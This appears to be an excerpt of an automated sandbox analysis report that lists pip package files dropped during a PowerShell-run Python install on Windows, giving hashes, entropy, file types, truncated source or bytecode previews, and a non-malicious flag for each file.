                              SSDEEP:96:qWhBuxc89eeuB3bybJ9dlwdNHyYhf9QGpo5QZOv7Q4IY4LrMn4sNqXj/Qy8uO+ND:qWh5890mLw7ycf91SgE7QsnE/DNiMSg
                              MD5:EA947CFEEE9C6ADD3CA6D39E9EFA3C98
                              SHA1:E28E26069246AB43190B65A83D9A362D31623D07
                              SHA-256:E17B33A75D7182BD76EB2CC6E816C9034A1A43D597BA16F48F251BFB2FFA94F4
                              SHA-512:5FCF07C4A901B2D768996D1275E5B680706C6B703F7EE526A0A1EED8660C2E1F0DFC2C1564E19A07663C24F73D983FD43ACCFC3F82E57C6EC0DBB3B427436569
                              Malicious:false
                              Preview:import importlib.util.import os.from collections import namedtuple.from typing import Any, List, Optional..from pip._vendor import tomli.from pip._vendor.packaging.requirements import InvalidRequirement, Requirement..from pip._internal.exceptions import (. InstallationError,. InvalidPyProjectBuildRequires,. MissingPyProjectBuildRequires,.)...def _is_list_of_str(obj: Any) -> bool:. return isinstance(obj, list) and all(isinstance(item, str) for item in obj)...def make_pyproject_path(unpacked_source_directory: str) -> str:. return os.path.join(unpacked_source_directory, "pyproject.toml")...BuildSystemDetails = namedtuple(. "BuildSystemDetails", ["requires", "backend", "check", "backend_path"].)...def load_pyproject_toml(. use_pep517: Optional[bool], pyproject_toml: str, setup_py: str, req_name: str.) -> Optional[BuildSystemDetails]:. """Load the pyproject.toml file... Parameters:. use_pep517 - Has the user requested PEP 517 processing? None.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):2738
                              Entropy (8bit):4.326201740902436
                              Encrypted:false
                              SSDEEP:48:dovZvw6xtd2ZhedgW+FbOjm+8CdCaksbZsIwZMtTwH8AXdjW:IxD122gW+Fbp+lCaksbpwmTQjW
                              MD5:90F6415749AEAC444FDC82A5D4A67413
                              SHA1:CF0EAD8F5FB907FC11C71DF8CBA39D7B2A024A1A
                              SHA-256:4C42C58193A87F796132668809558BF54ECF9615E8F4EB9FA246CC009E89D862
                              SHA-512:B85D577F6023DA280DF94ED9719FB64D804E0665EFC6014F5B3CF223D233966FFB9457A63A5CABE9BB097566314C42F46FB17E5B56F984154965F2A5A0BB6C02
                              Malicious:false
                              Preview:import collections.import logging.from typing import Generator, List, Optional, Sequence, Tuple..from pip._internal.utils.logging import indent_log..from .req_file import parse_requirements.from .req_install import InstallRequirement.from .req_set import RequirementSet..__all__ = [. "RequirementSet",. "InstallRequirement",. "parse_requirements",. "install_given_reqs",.]..logger = logging.getLogger(__name__)...class InstallationResult:. def __init__(self, name: str) -> None:. self.name = name.. def __repr__(self) -> str:. return f"InstallationResult(name={self.name!r})"...def _validate_requirements(. requirements: List[InstallRequirement],.) -> Generator[Tuple[str, InstallRequirement], None, None]:. for req in requirements:. assert req.name, f"invalid to-be-installed requirement: {req}". yield req.name, req...def install_given_reqs(. requirements: List[InstallRequirement],. global_options: Sequence[str],. root: Optional[str],.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3752
                              Entropy (8bit):5.523991616632478
                              Encrypted:false
                              SSDEEP:96:w5bwq5cBqMDHOcprPd/kfOQqJcbPdzmwDTeZ:iP+BqevtPHWTi
                              MD5:2D2160825AEA11B4F7F94F94BCA0D52F
                              SHA1:AD1BBED423BEA148229741F5DBA8A7ABC45E8FC2
                              SHA-256:709D1DF9A8A978716841B1E1E422EC31CA45AB76197415BB945B5CB16AFF602C
                              SHA-512:7B9D6CEFEEECAC99D3282ED8249862A9275BFEA535CA2F5411A26CA8336E78D194FCEC0E8665F0EBDE656B9E36DB36A981EBDA1AAC47ECF1F9812CDCFF9C1ACC
                              Malicious:false
                              Preview:........=.Cf................................d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z...e.j"..................e.........Z...G.d...d.........Z.d.e.e.....d.e.e.e.e.f.....d.d.f.....f.d...Z.d.e.e.....d.e.e.....d.e.e.....d.e.e.....d.e.e.....d.e.d.e.d.e.d.e.e.....f.d...Z.y.)......N)...Generator..List..Optional..Sequence..Tuple)...indent_log.....)...parse_requirements)...InstallRequirement)...RequirementSet).r....r....r......install_given_reqsc.....................(.....e.Z.d.Z.d.e.d.d.f.d...Z.d.e.f.d...Z.y.)...InstallationResult..name..returnNc...........................|.|._.........y.).N..r....)...selfr....s.... .fC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/req/__init__.py..__init__z.InstallationResult.__init__....s..................c.....................".....d.|.j.....................d...S.).Nz.InstallationResult(name=..)r....).r....s.... r......__repr__z.InstallationResult.__repr__....s
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):21591
                              Entropy (8bit):5.43885919622193
                              Encrypted:false
                              SSDEEP:384:Xt86OlvUlRfaNE2Eg/zJCG3da2kpQK3FZhYuQBnEsyuP/IuZpk:Xt8LlvUjfaNEYzYIkpQaYuKEsNZZpk
                              MD5:F7859F380BA6CB8005FEEE9A3A90046A
                              SHA1:418B138E83ACF35A65275F926252059FD2231B56
                              SHA-256:3E141C8B9964DB1314E8D3D4E7E18A0B3DABD352B15C034785328006198357C6
                              SHA-512:D436172ACDFCC799CFEE9A22E3AE5F7569A2130150DAF09E09F2D91082B63C986304D9DBAF206FC7263D2A353AC1848053274A50F96ABA93F59E955419C56D10
                              Malicious:false
                              Preview:........=.CfJJ........................x.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"..d.d.l#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+..g.d...Z,..e.jZ..................e.........Z/e.j`..................jc..........................Z2d.e3d.e.e3e.e3....f.....f.d...Z4d.e.e3....d.e.e3....f.d...Z5d.e.d.e.e3....d.e.f.d...Z6d.e3d.e.e.e3....e3e.e3....f.....f.d...Z7d.e3d.d.f.d...Z8d.e3d.e3f.d...Z9..G.d ..d!........Z:d.e3d.e:f.d"..Z;..d?d.d#d.d.d#d#d#d.d$..d.e3d%e.e.e e3f.........d&e.e<....d'e<d(e.e.e3........d)e.e.e3e.e3....f.........d*e<d+e<d,e<d-e.e.e3e.e3e.e3....f.....f.........d.e f.d...Z=d/e3d.e<f.d0..Z>d.e3d/e3d.e.e3....f.d1..Z?d/e3d2e.e3....d.e:f.d3..Z@..d?d.d#d.d.d#d.d#d.d4..d/e3d%e.e.e3e f.........d&e.e<....d'e<d(e.e.e3........d)e.e.e3e.e3....f.........d*e<d2e.e3....d+e<d-e.e.e3e.e3e.e3....f.....f.........d.e f.d5..ZA........d@d6
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):21470
                              Entropy (8bit):5.455486521872338
                              Encrypted:false
                              SSDEEP:384:lPt3l3ZckffNiknwp3k/TXzKJgwV6/Z9ArSbJ0t/okqfDO:dt3VZ/I9JWTXzug5Z9Zmt/ofK
                              MD5:C4C8043078DE5611623881BF330DE2C0
                              SHA1:4A1BDD2018BF5C2B29EA0CFD479A3E2CFA914618
                              SHA-256:AB427FC225DE7DFBAD98814A49D1CC56D50E7B10F4E37513A7796BFD9C1EE88D
                              SHA-512:47D3685B8471B8D71853426B7475AF4C0604C2938886631795871885E484E392E7D15F5C163077CA11A9EE41499AD34C0D3E3A682CF9A09D7C11B3DBB2E6D994
                              Malicious:false
                              Preview:........=.Cf~E.............................U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..e.r.d.d.l.m"Z"..d.d.l#m$Z$..d.g.Z%e.e.e&e'f.........Z(e.e'g.e.e'e.f.....f.....Z)..e.jT..................d.e.jV..........................Z,..e.jT..................d.........Z-..e.jT..................d.........Z.e.j^..................e.j`..................e.jb..................e.jd..................e.jf..................e.jh..................e.jj..................e.jl..................e.jn..................e.jp..................e.jr..................e.jt..................e.jv..................e.jx..................g.Z=e.e.d.e.j|..................f.........e?d.<...e.j...................e.j...................e.j...................g.ZCe.e.d.e.j|..................f.........e?d.<...e.j...................g.ZDe.e.d.e.j|..................f.........e?d.<...eC
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):38423
                              Entropy (8bit):5.288724359962651
                              Encrypted:false
                              SSDEEP:768:3gqqB5KvexzBluXkShnSmYSpylYAw+zerW9:3gqqBcWxp1IpyqG8S
                              MD5:A414B5BFEEA78E60A2B5A12B8BB9A0EA
                              SHA1:D240061FC265193F9E3329FD5081A9613B4CB808
                              SHA-256:6A18D88D62005E7915F14F62EDDAC5B70E155701CAAD97B727D878A6F91D5F81
                              SHA-512:99C341611F7104F7A548FA7EEABC4428A293CCF02541BC6A3FB77A591EC9F7A956F7456C9611CB27B19EC3E82A1595800503B0CDDCC905F222F8E1BF152FC729
                              Malicious:false
                              Preview:........=.Cf...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#m$Z$..d.d.l%m&Z&m'Z'..d.d.l(m)Z)..d.d.l*m+Z+m,Z,m-Z-m.Z...d.d.l/m0Z0..d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m6Z:..d.d.l;m<Z=..d.d.l>m?Z?..d.d.l@mAZAmBZB..d.d.lCmDZD..d.d.lEmFZF..d.d.lGmHZH..d.d.lImJZJmKZKmLZLmMZMmNZNmOZOmPZPmQZQ..d.d.lRmSZS..d.d.lTmUZU..d.d.lVmWZWmXZX..d.d.lYmZZZ..d.d l[m\Z\..d.d!l]m^Z^....e.j...................e`........Za..G.d"..d#........Zbd$ebd%ecf.d&..Zdd'e.d(e.eb....d)ecd%eef.d*..Zfd'e.d(e.eb....d%d.f.d+..Zgy.),.....N)...Values)...Path)...Any..Collection..Dict..Iterable..List..Optional..Sequence..Union)...Marker)...Requirement)...SpecifierSet)...canonicalize_name)...Version)...parse)...BuildBackendHookCaller)...BuildEnvironment..NoOpBuildEnvironment)...InstallationError..PreviousBuildDirError).
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):7227
                              Entropy (8bit):5.246466312937501
                              Encrypted:false
                              SSDEEP:96:tuIvP5dUIlHhvbUxtcZ5H29Hpt0au0hTFYmREJGKp8lfXtktpwkT5gUNQ:tT9lBvAxaf2h0azFLy7p819k395m
                              MD5:2B462A8E1DF7C91129275EAC5728010E
                              SHA1:A9F06AB060152133D93D03D1ADA3519AD2548FD2
                              SHA-256:C25E39D2CB3589FEBF33D59BE8AF0D5219B60027987E56587DBF22453C7BC628
                              SHA-512:5135E107795780FA7C8417A882D9AB4B0329ED8348F6AE3B0F2EA6F31F00116D84381273AADC847EE3EB8F325BACBF2B4AFD52C5EE249EB6E68560AEDDC54EC6
                              Malicious:false
                              Preview:........=.Cf`..............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j ..................e.........Z...G.d...d.........Z.y.)......N)...OrderedDict)...Dict..List)...LegacySpecifier)...canonicalize_name)...LegacyVersion)...InstallRequirement)...deprecatedc..........................e.Z.d.Z.d.d.e.d.d.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.e.d.d.f.d...Z.d.e.d.d.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.e.d.e.e.....f.d...........Z.e.d.e.e.....f.d...........Z.d.d...Z.y.)...RequirementSet..check_supported_wheels..returnNc.....................>.....t.................|._.........|.|._.........g.|._.........y.).z.Create a RequirementSet.N).r......requirementsr......unnamed_requirements)...selfr....s.... .eC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/req/req_set.py..__init__z.RequirementSet.__init__....s.........<G..=......&<....#.>@....!.....c..........................t.........d...|.j
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):32986
                              Entropy (8bit):5.206160340422903
                              Encrypted:false
                              SSDEEP:768:8P/s8bDt+8cFqeSOlkn05Mm4/uZrwG/CtFC1430Bb:8P/ZbDA1FfDAC14Ob
                              MD5:7A972D5EDF962BBF847646597EE808FC
                              SHA1:4DA52AFD33EFDFE275A6E399C26A17074A35815E
                              SHA-256:2E33DEF2A49D72EE3AAD83311C985C05C23777D8AE35A3FE10AAACA5AC8B5583
                              SHA-512:7A600694063228C048E5085709040C18D496CB19AACF701FD1182F92319BF5A14EEE18A328B80BAEBC24787A72E07DE940FFB772545B5E5F83C03783E4092CCE
                              Malicious:false
                              Preview:........=.Cf._..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"..d.d.l#m$Z$m%Z%..d.d.l&m'Z'....e.e(........Z)d.e*d.e*d.e+d.e.e*d.d.f.....f.d...Z,d.e.d.e.e.d.d.f.....f.....d.e.d.e.e.d.d.f.....f.....f.d...Z-e-d.e.d.e.e*d.d.f.....f.d...........Z.d.e.e*....d.e.e*....f.d...Z/d.e.e*....d.e.e*....f.d...Z0d.e.e*....d.e.e.e*....e.e*....f.....f.d...Z1..G.d...d.........Z2..G.d...d.........Z3..G.d...d ........Z4y.)!.....N)...cache_from_source)...Any..Callable..Dict..Generator..Iterable..List..Optional..Set..Tuple)...UninstallationError)...get_bin_prefix..get_bin_user)...BaseDistribution)...WINDOWS)...egg_link_path_from_location)...getLogger..indent_log)...ask..normalize_path..renames..rmtree)...AdjacentTempDirectory..TempDirectory)...running_under_virtualenv..bin_dir..script_name..is_gui..returnc................#.......K.....t..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):19018
                              Entropy (8bit):4.5153846504298185
                              Encrypted:false
                              SSDEEP:384:bYk+ErtWMTIHs16EvJT7HpPw1FZresif6kckMFvGAgBCl4q:Drw57Wtoib/tAhL
                              MD5:18D03004D257F83A9E3D4110530F71F3
                              SHA1:95D491FF36169C0C5FFFE9AEE67B6A6FD10BECD9
                              SHA-256:F21958E7A8A612D84B3914709A5A322B3DD83B25F298868AB0D07A3FD7B0BCD2
                              SHA-512:5CA7D9B1309EE20B72D63534480740CAD441571AA4AE2695157849DC263657C1AED2087FB871D8B4EC990D2AB0A1C5D593680ACD2669190FF58999987C99895B
                              Malicious:false
                              Preview:"""Backing implementation for InstallRequirement's various constructors..The idea here is that these formed a major chunk of InstallRequirement's size.so, moving them and support code dedicated to them outside of that class.helps creates for better understandability for the rest of the code...These are meant to be used elsewhere within pip to create instances of.InstallRequirement.."""..import copy.import logging.import os.import re.from typing import Collection, Dict, List, Optional, Set, Tuple, Union..from pip._vendor.packaging.markers import Marker.from pip._vendor.packaging.requirements import InvalidRequirement, Requirement.from pip._vendor.packaging.specifiers import Specifier..from pip._internal.exceptions import InstallationError.from pip._internal.models.index import PyPI, TestPyPI.from pip._internal.models.link import Link.from pip._internal.models.wheel import Wheel.from pip._internal.req.req_file import ParsedRequirement.from pip._internal.req.req_install import InstallRequ
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):17790
                              Entropy (8bit):4.538498148383151
                              Encrypted:false
                              SSDEEP:384:u0aYhgUFZckXTdrk01YlroGD5CIPwSwiwv2+90P:uwZ/jdfs1tPwS/HP
                              MD5:236D5B49A91A74A3AD27F50FA3FA2C3C
                              SHA1:3BA2944C19D21912A4DA5ECFAF37EA692CCF1AC3
                              SHA-256:33CB6D3992FE3F0023EEC70F125856DD90F68620FD9A6FFA14900621BC00CC42
                              SHA-512:DCF14E141C1A2239E9CB3D0D1AFD89E2A6DCF1D3BA8F01D59D318382F2082CD4F4077948F4FB97C3318C6CF1993D4C4B1FFD9570D82B5B6C69C15B500AA122B5
                              Malicious:false
                              Preview:""".Requirements file parsing."""..import logging.import optparse.import os.import re.import shlex.import urllib.parse.from optparse import Values.from typing import (. TYPE_CHECKING,. Any,. Callable,. Dict,. Generator,. Iterable,. List,. Optional,. Tuple,.)..from pip._internal.cli import cmdoptions.from pip._internal.exceptions import InstallationError, RequirementsFileParseError.from pip._internal.models.search_scope import SearchScope.from pip._internal.network.session import PipSession.from pip._internal.network.utils import raise_for_status.from pip._internal.utils.encoding import auto_decode.from pip._internal.utils.urls import get_url_scheme..if TYPE_CHECKING:. # NoReturn introduced in 3.6.2; imported only for type checking to maintain. # pip compatibility with older patch versions of Python 3.6. from typing import NoReturn.. from pip._internal.index.package_finder import PackageFinder..__all__ = ["parse_requirements"]..ReqFileLines = Itera
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):35460
                              Entropy (8bit):4.349820575274182
                              Encrypted:false
                              SSDEEP:384:z+M0Pf6CKYptCGjRZMBm5m3ojz2JQw9u3W/3:zm6mptCWUqz2J9J/3
                              MD5:DA54C14920379FE466FF0DA19B7028AC
                              SHA1:9C22316E093B009D97FE5D36431C31099BF5CCA7
                              SHA-256:C2D38FC64C9148CF1CA264E4B3CA0BD46A76A321AA6C7EC9C080D1722D9088F9
                              SHA-512:F9DBEB8B249146AC2EA96C6BA277EA0F182E134DC8FC0570FC09642151E92E50A44626E90B5E4FBD52BE77C8DB48486C038063580B2065AAD954069336E41BDF
                              Malicious:false
                              Preview:import functools.import logging.import os.import shutil.import sys.import uuid.import zipfile.from optparse import Values.from pathlib import Path.from typing import Any, Collection, Dict, Iterable, List, Optional, Sequence, Union..from pip._vendor.packaging.markers import Marker.from pip._vendor.packaging.requirements import Requirement.from pip._vendor.packaging.specifiers import SpecifierSet.from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.packaging.version import Version.from pip._vendor.packaging.version import parse as parse_version.from pip._vendor.pyproject_hooks import BuildBackendHookCaller..from pip._internal.build_env import BuildEnvironment, NoOpBuildEnvironment.from pip._internal.exceptions import InstallationError, PreviousBuildDirError.from pip._internal.locations import get_scheme.from pip._internal.metadata import (. BaseDistribution,. get_default_environment,. get_directory_distribution,. get_wheel_distribution,.).from pip._inter
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):4704
                              Entropy (8bit):4.216083028637518
                              Encrypted:false
                              SSDEEP:48:yqtq84IDbgjQvJUjASvpC319hi9uDh4FoN7z+ULtYKP/g23syOygj:dX73g+J2XI319sih20a2d/jlOyU
                              MD5:0ADC2DA9F4F72B393701262DF03D5961
                              SHA1:49A3ABAB94A935BDC119F167997A24FBF9417B41
                              SHA-256:88C603513A12824C45CAB3FF3AB4ED3D2830E1DC234721910E91A8A13A9E0386
                              SHA-512:DF5B6A8A61C2CBA426339D5633E81E29CD52C8DA8639D2E72BC0EF99E7AD29AF3597D71852C9BF963F15E7752BE6D3793C8B92BD86ACD74378D1F97BC1F0FD88
                              Malicious:false
                              Preview:import logging.from collections import OrderedDict.from typing import Dict, List..from pip._vendor.packaging.specifiers import LegacySpecifier.from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.packaging.version import LegacyVersion..from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.deprecation import deprecated..logger = logging.getLogger(__name__)...class RequirementSet:. def __init__(self, check_supported_wheels: bool = True) -> None:. """Create a RequirementSet.""".. self.requirements: Dict[str, InstallRequirement] = OrderedDict(). self.check_supported_wheels = check_supported_wheels.. self.unnamed_requirements: List[InstallRequirement] = [].. def __str__(self) -> str:. requirements = sorted(. (req for req in self.requirements.values() if not req.comes_from),. key=lambda req: canonicalize_name(req.name or ""),. ). return " ".join(str(req.req) for
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):24551
                              Entropy (8bit):4.372446389382628
                              Encrypted:false
                              SSDEEP:384:hd/9msLNLjyO1XZ8RvFuSjEiRMFfiGf0zdTjtAttm5QqglW:hd0sLpTGjECWqGf01jattm57glW
                              MD5:17F5E081F34812C1B3BDFCCAB3FBE0E7
                              SHA1:E3549EC01B2680F073048E2198EEBA53FAA5EEA5
                              SHA-256:9E6BD341A4420B48AEFB94F0D1D8E55C98528FA5A6A8746F4F7AA4904742DF91
                              SHA-512:A7414A1007A7845891F0C7CD6E5489CBB37BDF8F7BF72E8E0D2A7C788C4884D392A70C0DE121319C8A1F6E04996C3EC8E47ADAF27370D99D004A8D583688A5AD
                              Malicious:false
                              Preview:import functools.import os.import sys.import sysconfig.from importlib.util import cache_from_source.from typing import Any, Callable, Dict, Generator, Iterable, List, Optional, Set, Tuple..from pip._internal.exceptions import UninstallationError.from pip._internal.locations import get_bin_prefix, get_bin_user.from pip._internal.metadata import BaseDistribution.from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.egg_link import egg_link_path_from_location.from pip._internal.utils.logging import getLogger, indent_log.from pip._internal.utils.misc import ask, normalize_path, renames, rmtree.from pip._internal.utils.temp_dir import AdjacentTempDirectory, TempDirectory.from pip._internal.utils.virtualenv import running_under_virtualenv..logger = getLogger(__name__)...def _script_names(. bin_dir: str, script_name: str, is_gui: bool.) -> Generator[str, None, None]:. """Create the fully qualified name of the files created by. {console,gui}_scripts for the given ``d
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):206
                              Entropy (8bit):4.783028185348878
                              Encrypted:false
                              SSDEEP:6:rH/cl/Vne75jDn23d6oAreKAyECP6Iaatgem/l:T0tVe7ZSImbcPjaatHmt
                              MD5:4A2E3680249665CDB95C54F9DE7E84CD
                              SHA1:B3B9B7E5CA41A2D981CA78FF53D6DDC2AE7178D7
                              SHA-256:C483348B83C56233161BAD4A82CA53EC19C7DF3AEDDA1E4BD449C647688AA4A1
                              SHA-512:30642E4F3E5613F10F6D54A823AF7CCF38DB445234D34CDF67776C0018796EDEFBBBAC15608F6CFC205B5554F958315F6B932030696C30C6F7662D6EDE18553D
                              Malicious:false
                              Preview:........=.Cf................................y.).N..r..........mC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/__init__.py..<module>r........s.........r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1194
                              Entropy (8bit):5.267534912765226
                              Encrypted:false
                              SSDEEP:24:fngE2mUXesnxgrqjO3YS6egO5lV3JElqbHFhs2DplJOn3EVuYf54hQ:oEjUXhBjOgOzbEefvd7lVuY4Q
                              MD5:BA79ADF1DF67E10B2C0A9AE070F792DD
                              SHA1:73B9D3054600ACEEDF39220B25FB3F83DF8EA886
                              SHA-256:3107CA1285BB0242F7B44EA311B148D2F0E7EC3972738E0766DF4A2A391A30FE
                              SHA-512:5370B58809EADC9006122DA56FF3AAC0585A1C4D1742DA73AD6302D4E433DF3DD568A816E222E8CA4729A962CA7D90EFBE47154CB3DA4C13944089AF32F4A739
                              Malicious:false
                              Preview:........=.CfG.........................\.....d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.e.e.....g.e.f.....Z...G.d...d.........Z.y.)......)...Callable..List..Optional)...InstallRequirement)...RequirementSetc.....................<.....e.Z.d.Z.d.e.e.....d.e.d.e.f.d...Z.d.e.d.e.e.....f.d...Z.y.)...BaseResolver..root_reqs..check_supported_wheels..returnc...........................t.....................N....NotImplementedError)...selfr....r....s.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/base.py..resolvez.BaseResolver.resolve..............."..#..#.......req_setc...........................t...................r....r....).r....r....s.... r......get_installation_orderz#BaseResolver.get_installation_order....r....r....N)...__name__..__module__..__qualname__r....r......boolr....r....r......r....r....r....r........s@.........$.....0..1....$.KO....$.......$....$..%....$..... ..!....$r....r....N)...typingr....r....r......pip._interna
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):583
                              Entropy (8bit):4.579538678497288
                              Encrypted:false
                              SSDEEP:12:1REYB1/qMDgYSYqMWKiQFi3RHWkuGn4U4jSXxTZ2cfnU6ZKo7CGN2yQfny:1REq/cYIU8RHvuG4UCSXBZ2cPOCN25Py
                              MD5:BBFA436B355A45AA3393C1E1AC9033F2
                              SHA1:BB0A50E2866D29BB4C616CF2900FA3EB8EED3051
                              SHA-256:AA59A1DF6E520557EF1BA31EF6073936C879B1DC07070CC706AE9A117B4AB0B0
                              SHA-512:4AFE1CB158E4CA8FA05DE5B664CED2E6F3CA5126CEF3F124DB0A17FF95786FAA21434C11AF603774184264E5AD47D82E621E16FF78DDAF290DB2967331B530DB
                              Malicious:false
                              Preview:from typing import Callable, List, Optional..from pip._internal.req.req_install import InstallRequirement.from pip._internal.req.req_set import RequirementSet..InstallRequirementProvider = Callable[. [str, Optional[InstallRequirement]], InstallRequirement.]...class BaseResolver:. def resolve(. self, root_reqs: List[InstallRequirement], check_supported_wheels: bool. ) -> RequirementSet:. raise NotImplementedError().. def get_installation_order(. self, req_set: RequirementSet. ) -> List[InstallRequirement]:. raise NotImplementedError().
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):213
                              Entropy (8bit):4.803469557430526
                              Encrypted:false
                              SSDEEP:6:rH/cl/VneSn23d6oAreKAyECGQ6Iaatgem/l:T0tVerImbcGQjaatHmt
                              MD5:B761D83DBC5A8E87980B28814E26B5D3
                              SHA1:586A8CBB13E40A21F3342A36E4F4E034C197886F
                              SHA-256:D7DD5CCC806277F11764C0E5F171149BA757F22B893F0D086C59AA05F18714C9
                              SHA-512:401884210E66589F68A4A4EF893DA3837A7E0FF56D6DC140114E5A1D0C664D636D45EC021C5058D4E1EEC68720AD1F55C44527E61F9D68C6AE6CE5D03BE796EB
                              Malicious:false
                              Preview:........=.Cf................................y.).N..r..........tC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/legacy/__init__.py..<module>r........s.........r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):22448
                              Entropy (8bit):5.431543876548154
                              Encrypted:false
                              SSDEEP:384:M4Htag8ghiaXwHN0pv+WPfVriO8TiDMCYK5viGfFitz+myUttVyR:xHtag8gtAtyv+WP9+uZdFitz0UttoR
                              MD5:96558E3D4ED583314F72732658D0ED48
                              SHA1:E3502A8CA035D279C527C93E09550D74EBF59DED
                              SHA-256:FD6D23874C26AC677FC8FF735EA6858559DA6F287D9DF603A1B74FF12E41BC9C
                              SHA-512:4623FC246F8AA80E7CF13900F626D8D186C4CFF85362E5C7A9FA49631C5A7B48A4ECE6DF4DDADFE713632DD5276787CEC566D8B6B9FEC38A65F6063E15AF17EF
                              Malicious:false
